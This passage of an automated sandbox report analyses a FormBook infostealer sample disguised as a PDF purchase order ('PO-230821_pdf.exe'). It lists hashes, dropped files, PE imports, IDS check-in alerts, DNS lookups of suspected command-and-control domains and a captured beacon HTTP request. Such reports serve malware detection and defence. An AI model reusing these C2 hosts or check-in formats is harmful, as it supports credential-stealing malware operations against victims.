                                          SHA-512:D396BB8EAC5CEE14D2A521DB42CBDEBF080FC8B75C573105DAE6FA7E8A4FBC14E377CB20051E9A379BFD2487D3F6DEB5799DD44336FE6836E03E5BA6E1F71333
                                          Malicious:false
                                          Preview:..,...*....8...m.....v..c....9H..v%..m......h..NN.D.%...y0..[.g......g-i.s.5W.B..Wz...""bV....<Mf...I,.1.T.=........o4z..b.ILI.'...dVlFZ......N.j.&...]p....G.'.-l..q.....j.}.6..)Z....m....d.#e...R...|.^i..a.]E.{...)..".:......-@g.d..]uz~.u...^..*..?..fY.........k...2..Vi.9....%..m5....h..N..D.%....0..gJ."..(.....'....P..r.{.n.:e.Wy/.....y..zN..=<q.#Z4....o4zGt....~.K{.S...y ...+L..@j}1*`jv..8q..`.yT..].%......j.B.|P.)ZJ...{.....e...R...|...@!a..`.{...).."0.......-...d.=]u.~.u.L..^..*..?..fY...ha....k...2....9H..v%..m......h..NN.D.%....0..gJ."..(.....'....P..r.{.n.:e.Wy/.....y..zN..=<q.#Z4....o4zGt....~.K{.S...y ...+L..@j}1*`jv..8q..`.yT..].%......j.}.6..)Z.@....{...|.e...R...|...@!a..`.{...).."0.......-...d.=]u.~.u.L..^..*..?..fY...ha....k...2....9H..v%..m......h..NN.D.%....0..gJ."..(.....'....P..r.{.n.:e.Wy/.....y..zN..=<q.#Z4....o4zGt....~.K{.S...y ...+L..@j}1*`jv..8q..`.yT..].%......j.}.6..)Z.@....{...|.e...R...|...@!a..`.{...).."
                                          Process:C:\Users\user\Desktop\PO-230821_pdf.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):265544
                                          Entropy (8bit):7.780542613579891
                                          Encrypted:false
                                          SSDEEP:6144:56JOarRiGs9UKrKX5Q6VNL3Jdn214+kYcVsus0ou:56J+GpM+5b93Jd28YcVsusVu
                                          MD5:3F8E96B0E9FD292B6621A04F342EE445
                                          SHA1:C18AA269C6628E9AAA10985DBD8D498076AEC49B
                                          SHA-256:5CCEB238AE0C7F0C722BE7A0300F9BF7811606BB45EBB6E676A6815FDC415538
                                          SHA-512:7B2743F3D9ABC2878B5FBD18C7760EED257E4ACE16019E5E20DE5BCC2FF94D94AE9148566795DE074F0DE7D1D0129B3E00E2E8EAD4F537A918088CE5E672505E
                                          Malicious:false
                                          Preview:........,...................>...............................................................................................................................................................................................................................................................G...................j........................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\PO-230821_pdf.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):47616
                                          Entropy (8bit):6.306918603125531
                                          Encrypted:false
                                          SSDEEP:768:MpS4WFkWFhTdW66YL36jOG7bYtEESAboWV2NKsEBsQyddj5MzxqD1wpz:MpS4U9XbgdKQf56qD1u
                                          MD5:588CB1A8E7A30760B06E0D17E1D530DA
                                          SHA1:81C3B8AD80B3EAB1CCA85EFABA50CC06F4FEA922
                                          SHA-256:0E48E95E34121C2872695725E6BC3A7B266112437733FE9D7F290E72D201F97C
                                          SHA-512:BB3E2BD8A7F9EE3693C5D777352EFF23C2C4AAF61ADF8954166F6B05D163307C55A33AE06D423C569485B92E51336C09DB62C2393D131AB40B1F21663DC89644
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 67%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H..)..)..).e....).e....).e....)..)..).]^n..)......)......)......)......).Rich.).........PE..L...z..d...........!.....d...R..........................................................................................F...........................................................................X...@............................................text....c.......d.................. ..`.rdata...'.......(...h..............@..@.data....,..........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.908366794392515
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:PO-230821_pdf.exe
                                          File size:260'228 bytes
                                          MD5:ac43233dd5fe6d55c112660dc700e564
                                          SHA1:2f431f411c707593f2f4bd67da5db2e9a9593778
                                          SHA256:d93182b7b2c8633aa7f379efdc80aa778ecc0b59a01929bb10a02cd8349354d2
                                          SHA512:a3fd81e3d3e4e7271ef1536e8f0c10c945780a916e168bd19bd67e03dd2a326b5910bf528220aa24ccd8799e02b50fbc30e953b3cde2c3d8a2c0dffd0278c770
                                          SSDEEP:6144:/Ya6lEiLxFG1cz5mqDoGPuduieEJE827qVkF28m4znusYtq4yC:/Y3EUxFzz57Dooudu9A5ko4zusYtFyC
                                          TLSH:2644121458B0D85FE9F347722E35899D1AE6FA315DE8DA6FD3800E647C36200E92B3E1
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                          Icon Hash:3d2e0f95332b3399
                                          Entrypoint:0x403640
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:61259b55b8912888e90f516ca08dc514
                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          sub esp, 000003F4h
                                          push ebx
                                          push esi
                                          push edi
                                          push 00000020h
                                          pop edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [ebp-14h], ebx
                                          mov dword ptr [ebp-04h], 0040A230h
                                          mov dword ptr [ebp-10h], ebx
                                          call dword ptr [004080C8h]
                                          mov esi, dword ptr [004080CCh]
                                          lea eax, dword ptr [ebp-00000140h]
                                          push eax
                                          mov dword ptr [ebp-0000012Ch], ebx
                                          mov dword ptr [ebp-2Ch], ebx
                                          mov dword ptr [ebp-28h], ebx
                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                          call esi
                                          test eax, eax
                                          jne 00007F8224EA9B3Ah
                                          lea eax, dword ptr [ebp-00000140h]
                                          mov dword ptr [ebp-00000140h], 00000114h
                                          push eax
                                          call esi
                                          mov ax, word ptr [ebp-0000012Ch]
                                          mov ecx, dword ptr [ebp-00000112h]
                                          sub ax, 00000053h
                                          add ecx, FFFFFFD0h
                                          neg ax
                                          sbb eax, eax
                                          mov byte ptr [ebp-26h], 00000004h
                                          not eax
                                          and eax, ecx
                                          mov word ptr [ebp-2Ch], ax
                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                          jnc 00007F8224EA9B0Ah
                                          and word ptr [ebp-00000132h], 0000h
                                          mov eax, dword ptr [ebp-00000134h]
                                          movzx ecx, byte ptr [ebp-00000138h]
                                          mov dword ptr [0042A318h], eax
                                          xor eax, eax
                                          mov ah, byte ptr [ebp-0000013Ch]
                                          movzx eax, ax
                                          or eax, ecx
                                          xor ecx, ecx
                                          mov ch, byte ptr [ebp-2Ch]
                                          movzx ecx, cx
                                          shl eax, 10h
                                          or eax, ecx
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xca0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x3b0000xca00xe00False0.41908482142857145data4.185920130122968IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                          RT_DIALOG0x3b4c00x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0x3b5c00x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0x3b6e00x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0x3b7400x14dataEnglishUnited States1.2
                                          RT_VERSION0x3b7580x208dataEnglishUnited States0.5288461538461539
                                          RT_MANIFEST0x3b9600x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                          DLLImport
                                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          192.168.2.934.102.136.18049713802031412 08/22/23-13:43:19.690083TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.934.102.136.180
                                          192.168.2.91.1.1.149710802031412 08/22/23-13:42:15.993943TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.91.1.1.1
                                          192.168.2.935.233.138.13249712802031412 08/22/23-13:42:58.501536TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.935.233.138.132
                                          192.168.2.9217.70.184.5049715802031412 08/22/23-13:44:02.774000TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.9217.70.184.50
                                          192.168.2.966.96.162.12949711802031412 08/22/23-13:42:37.152483TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.966.96.162.129
                                          192.168.2.9188.114.97.749714802031412 08/22/23-13:43:41.839079TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.9188.114.97.7
                                          192.168.2.934.149.87.4549716802031412 08/22/23-13:44:28.778609TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.934.149.87.45
                                          192.168.2.9107.148.25.12249733802031412 08/22/23-13:45:13.541361TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.9107.148.25.122
                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 22, 2023 13:42:15.976671934 CEST4971080192.168.2.91.1.1.1
                                          Aug 22, 2023 13:42:15.993668079 CEST80497101.1.1.1192.168.2.9
                                          Aug 22, 2023 13:42:15.993810892 CEST4971080192.168.2.91.1.1.1
                                          Aug 22, 2023 13:42:15.993942976 CEST4971080192.168.2.91.1.1.1
                                          Aug 22, 2023 13:42:16.010885000 CEST80497101.1.1.1192.168.2.9
                                          Aug 22, 2023 13:42:16.013703108 CEST80497101.1.1.1192.168.2.9
                                          Aug 22, 2023 13:42:16.013837099 CEST80497101.1.1.1192.168.2.9
                                          Aug 22, 2023 13:42:16.013900042 CEST4971080192.168.2.91.1.1.1
                                          Aug 22, 2023 13:42:16.013900042 CEST4971080192.168.2.91.1.1.1
                                          Aug 22, 2023 13:42:16.030793905 CEST80497101.1.1.1192.168.2.9
                                          Aug 22, 2023 13:42:37.041690111 CEST4971180192.168.2.966.96.162.129
                                          Aug 22, 2023 13:42:37.152060032 CEST804971166.96.162.129192.168.2.9
                                          Aug 22, 2023 13:42:37.152333975 CEST4971180192.168.2.966.96.162.129
                                          Aug 22, 2023 13:42:37.152482986 CEST4971180192.168.2.966.96.162.129
                                          Aug 22, 2023 13:42:37.258148909 CEST804971166.96.162.129192.168.2.9
                                          Aug 22, 2023 13:42:37.276149988 CEST804971166.96.162.129192.168.2.9
                                          Aug 22, 2023 13:42:37.276189089 CEST804971166.96.162.129192.168.2.9
                                          Aug 22, 2023 13:42:37.276505947 CEST4971180192.168.2.966.96.162.129
                                          Aug 22, 2023 13:42:37.276721001 CEST4971180192.168.2.966.96.162.129
                                          Aug 22, 2023 13:42:37.382281065 CEST804971166.96.162.129192.168.2.9
                                          Aug 22, 2023 13:42:58.336713076 CEST4971280192.168.2.935.233.138.132
                                          Aug 22, 2023 13:42:58.500880957 CEST804971235.233.138.132192.168.2.9
                                          Aug 22, 2023 13:42:58.501199007 CEST4971280192.168.2.935.233.138.132
                                          Aug 22, 2023 13:42:58.501535892 CEST4971280192.168.2.935.233.138.132
                                          Aug 22, 2023 13:42:58.665221930 CEST804971235.233.138.132192.168.2.9
                                          Aug 22, 2023 13:42:58.665471077 CEST804971235.233.138.132192.168.2.9
                                          Aug 22, 2023 13:42:58.665513039 CEST804971235.233.138.132192.168.2.9
                                          Aug 22, 2023 13:42:58.665719032 CEST4971280192.168.2.935.233.138.132
                                          Aug 22, 2023 13:42:58.665857077 CEST4971280192.168.2.935.233.138.132
                                          Aug 22, 2023 13:42:58.829615116 CEST804971235.233.138.132192.168.2.9
                                          Aug 22, 2023 13:43:19.674412966 CEST4971380192.168.2.934.102.136.180
                                          Aug 22, 2023 13:43:19.689685106 CEST804971334.102.136.180192.168.2.9
                                          Aug 22, 2023 13:43:19.689918995 CEST4971380192.168.2.934.102.136.180
                                          Aug 22, 2023 13:43:19.690083027 CEST4971380192.168.2.934.102.136.180
                                          Aug 22, 2023 13:43:19.705188990 CEST804971334.102.136.180192.168.2.9
                                          Aug 22, 2023 13:43:19.819530010 CEST804971334.102.136.180192.168.2.9
                                          Aug 22, 2023 13:43:19.819578886 CEST804971334.102.136.180192.168.2.9
                                          Aug 22, 2023 13:43:19.820410013 CEST4971380192.168.2.934.102.136.180
                                          Aug 22, 2023 13:43:19.820472956 CEST4971380192.168.2.934.102.136.180
                                          Aug 22, 2023 13:43:19.844294071 CEST804971334.102.136.180192.168.2.9
                                          Aug 22, 2023 13:43:41.821089029 CEST4971480192.168.2.9188.114.97.7
                                          Aug 22, 2023 13:43:41.838574886 CEST8049714188.114.97.7192.168.2.9
                                          Aug 22, 2023 13:43:41.838789940 CEST4971480192.168.2.9188.114.97.7
                                          Aug 22, 2023 13:43:41.839078903 CEST4971480192.168.2.9188.114.97.7
                                          Aug 22, 2023 13:43:41.856307030 CEST8049714188.114.97.7192.168.2.9
                                          Aug 22, 2023 13:43:42.186495066 CEST8049714188.114.97.7192.168.2.9
                                          Aug 22, 2023 13:43:42.186521053 CEST8049714188.114.97.7192.168.2.9
                                          Aug 22, 2023 13:43:42.186590910 CEST8049714188.114.97.7192.168.2.9
                                          Aug 22, 2023 13:43:42.186916113 CEST4971480192.168.2.9188.114.97.7
                                          Aug 22, 2023 13:43:42.186916113 CEST4971480192.168.2.9188.114.97.7
                                          Aug 22, 2023 13:43:42.187005043 CEST4971480192.168.2.9188.114.97.7
                                          Aug 22, 2023 13:44:02.738617897 CEST4971580192.168.2.9217.70.184.50
                                          Aug 22, 2023 13:44:02.773525000 CEST8049715217.70.184.50192.168.2.9
                                          Aug 22, 2023 13:44:02.773785114 CEST4971580192.168.2.9217.70.184.50
                                          Aug 22, 2023 13:44:02.773999929 CEST4971580192.168.2.9217.70.184.50
                                          Aug 22, 2023 13:44:02.808708906 CEST8049715217.70.184.50192.168.2.9
                                          Aug 22, 2023 13:44:02.814177990 CEST8049715217.70.184.50192.168.2.9
                                          Aug 22, 2023 13:44:02.814225912 CEST8049715217.70.184.50192.168.2.9
                                          Aug 22, 2023 13:44:02.814245939 CEST8049715217.70.184.50192.168.2.9
                                          Aug 22, 2023 13:44:02.814483881 CEST4971580192.168.2.9217.70.184.50
                                          Aug 22, 2023 13:44:02.814532042 CEST4971580192.168.2.9217.70.184.50
                                          Aug 22, 2023 13:44:28.762764931 CEST4971680192.168.2.934.149.87.45
                                          Aug 22, 2023 13:44:28.778274059 CEST804971634.149.87.45192.168.2.9
                                          Aug 22, 2023 13:44:28.778462887 CEST4971680192.168.2.934.149.87.45
                                          Aug 22, 2023 13:44:28.778609037 CEST4971680192.168.2.934.149.87.45
                                          Aug 22, 2023 13:44:28.793787003 CEST804971634.149.87.45192.168.2.9
                                          Aug 22, 2023 13:44:28.919048071 CEST804971634.149.87.45192.168.2.9
                                          Aug 22, 2023 13:44:28.919085026 CEST804971634.149.87.45192.168.2.9
                                          Aug 22, 2023 13:44:28.919332027 CEST4971680192.168.2.934.149.87.45
                                          Aug 22, 2023 13:44:28.919378996 CEST4971680192.168.2.934.149.87.45
                                          Aug 22, 2023 13:44:28.943342924 CEST804971634.149.87.45192.168.2.9
                                          Aug 22, 2023 13:45:13.374234915 CEST4973380192.168.2.9107.148.25.122
                                          Aug 22, 2023 13:45:13.541038990 CEST8049733107.148.25.122192.168.2.9
                                          Aug 22, 2023 13:45:13.541172028 CEST4973380192.168.2.9107.148.25.122
                                          Aug 22, 2023 13:45:13.541361094 CEST4973380192.168.2.9107.148.25.122
                                          Aug 22, 2023 13:45:13.707973003 CEST8049733107.148.25.122192.168.2.9
                                          Aug 22, 2023 13:45:13.708733082 CEST8049733107.148.25.122192.168.2.9
                                          Aug 22, 2023 13:45:13.708760023 CEST8049733107.148.25.122192.168.2.9
                                          Aug 22, 2023 13:45:13.708934069 CEST4973380192.168.2.9107.148.25.122
                                          Aug 22, 2023 13:45:13.708992004 CEST4973380192.168.2.9107.148.25.122
                                          Aug 22, 2023 13:45:13.875713110 CEST8049733107.148.25.122192.168.2.9
                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 22, 2023 13:42:15.764605999 CEST5715753192.168.2.98.8.8.8
                                          Aug 22, 2023 13:42:15.970105886 CEST53571578.8.8.8192.168.2.9
                                          Aug 22, 2023 13:42:36.908777952 CEST6231053192.168.2.98.8.8.8
                                          Aug 22, 2023 13:42:37.039114952 CEST53623108.8.8.8192.168.2.9
                                          Aug 22, 2023 13:42:58.270390034 CEST6549253192.168.2.98.8.8.8
                                          Aug 22, 2023 13:42:58.334352016 CEST53654928.8.8.8192.168.2.9
                                          Aug 22, 2023 13:43:19.630697012 CEST5357953192.168.2.98.8.8.8
                                          Aug 22, 2023 13:43:19.672180891 CEST53535798.8.8.8192.168.2.9
                                          Aug 22, 2023 13:43:41.773442984 CEST5784653192.168.2.98.8.8.8
                                          Aug 22, 2023 13:43:41.817755938 CEST53578468.8.8.8192.168.2.9
                                          Aug 22, 2023 13:44:02.665364027 CEST6157553192.168.2.98.8.8.8
                                          Aug 22, 2023 13:44:02.736747980 CEST53615758.8.8.8192.168.2.9
                                          Aug 22, 2023 13:44:28.699012041 CEST6281453192.168.2.98.8.8.8
                                          Aug 22, 2023 13:44:28.760782957 CEST53628148.8.8.8192.168.2.9
                                          Aug 22, 2023 13:44:50.920382977 CEST6197253192.168.2.98.8.8.8
                                          Aug 22, 2023 13:44:50.961489916 CEST53619728.8.8.8192.168.2.9
                                          Aug 22, 2023 13:45:13.046680927 CEST5416153192.168.2.98.8.8.8
                                          Aug 22, 2023 13:45:13.372400045 CEST53541618.8.8.8192.168.2.9
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Aug 22, 2023 13:42:15.764605999 CEST192.168.2.98.8.8.80x3533Standard query (0)www.974dp.comA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:42:36.908777952 CEST192.168.2.98.8.8.80xf6deStandard query (0)www.bmmboo.comA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:42:58.270390034 CEST192.168.2.98.8.8.80x1334Standard query (0)www.ownlegalhelp.comA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:43:19.630697012 CEST192.168.2.98.8.8.80x5b4cStandard query (0)www.4tbbwa.comA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:43:41.773442984 CEST192.168.2.98.8.8.80x335aStandard query (0)www.ahevrlh.xyzA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:44:02.665364027 CEST192.168.2.98.8.8.80xace2Standard query (0)www.thirdmind.networkA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:44:28.699012041 CEST192.168.2.98.8.8.80xcd66Standard query (0)www.thewhiteorchidspa.comA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:44:50.920382977 CEST192.168.2.98.8.8.80x2949Standard query (0)www.zachmahl.comA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:45:13.046680927 CEST192.168.2.98.8.8.80x9055Standard query (0)www.uahrbqtj.cfdA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Aug 22, 2023 13:42:15.970105886 CEST8.8.8.8192.168.2.90x3533No error (0)www.974dp.comha-ppy.happy-sljfs-iiuiuwoe.comCNAME (Canonical name)IN (0x0001)false
                                          Aug 22, 2023 13:42:15.970105886 CEST8.8.8.8192.168.2.90x3533No error (0)ha-ppy.happy-sljfs-iiuiuwoe.comhappy.zgag-zxxgagugue.comCNAME (Canonical name)IN (0x0001)false
                                          Aug 22, 2023 13:42:15.970105886 CEST8.8.8.8192.168.2.90x3533No error (0)happy.zgag-zxxgagugue.com1.1.1.1A (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:42:37.039114952 CEST8.8.8.8192.168.2.90xf6deNo error (0)www.bmmboo.com66.96.162.129A (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:42:58.334352016 CEST8.8.8.8192.168.2.90x1334No error (0)www.ownlegalhelp.com35.233.138.132A (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:43:19.672180891 CEST8.8.8.8192.168.2.90x5b4cNo error (0)www.4tbbwa.com4tbbwa.comCNAME (Canonical name)IN (0x0001)false
                                          Aug 22, 2023 13:43:19.672180891 CEST8.8.8.8192.168.2.90x5b4cNo error (0)4tbbwa.com34.102.136.180A (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:43:41.817755938 CEST8.8.8.8192.168.2.90x335aNo error (0)www.ahevrlh.xyz188.114.97.7A (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:43:41.817755938 CEST8.8.8.8192.168.2.90x335aNo error (0)www.ahevrlh.xyz188.114.96.7A (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:44:02.736747980 CEST8.8.8.8192.168.2.90xace2No error (0)www.thirdmind.networkwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                          Aug 22, 2023 13:44:02.736747980 CEST8.8.8.8192.168.2.90xace2No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:44:28.760782957 CEST8.8.8.8192.168.2.90xcd66No error (0)www.thewhiteorchidspa.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                          Aug 22, 2023 13:44:28.760782957 CEST8.8.8.8192.168.2.90xcd66No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                          Aug 22, 2023 13:44:28.760782957 CEST8.8.8.8192.168.2.90xcd66No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:44:50.961489916 CEST8.8.8.8192.168.2.90x2949Name error (3)www.zachmahl.comnonenoneA (IP address)IN (0x0001)false
                                          Aug 22, 2023 13:45:13.372400045 CEST8.8.8.8192.168.2.90x9055No error (0)www.uahrbqtj.cfd107.148.25.122A (IP address)IN (0x0001)false
                                          • www.974dp.com
                                          • www.bmmboo.com
                                          • www.ownlegalhelp.com
                                          • www.4tbbwa.com
                                          • www.ahevrlh.xyz
                                          • www.thirdmind.network
                                          • www.thewhiteorchidspa.com
                                          • www.uahrbqtj.cfd
                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.9497101.1.1.180C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 22, 2023 13:42:15.993942976 CEST15OUTGET /sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi HTTP/1.1
                                          Host: www.974dp.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 22, 2023 13:42:16.013703108 CEST15INHTTP/1.1 409 Conflict
                                          Date: Tue, 22 Aug 2023 11:42:15 GMT
                                          Content-Type: text/plain; charset=UTF-8
                                          Content-Length: 16
                                          Connection: close
                                          X-Frame-Options: SAMEORIGIN
                                          Referrer-Policy: same-origin
                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                          Server: cloudflare
                                          CF-RAY: 7faad9f5ee229b34-FRA
                                          Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                          Data Ascii: error code: 1001


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.94971166.96.162.12980C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
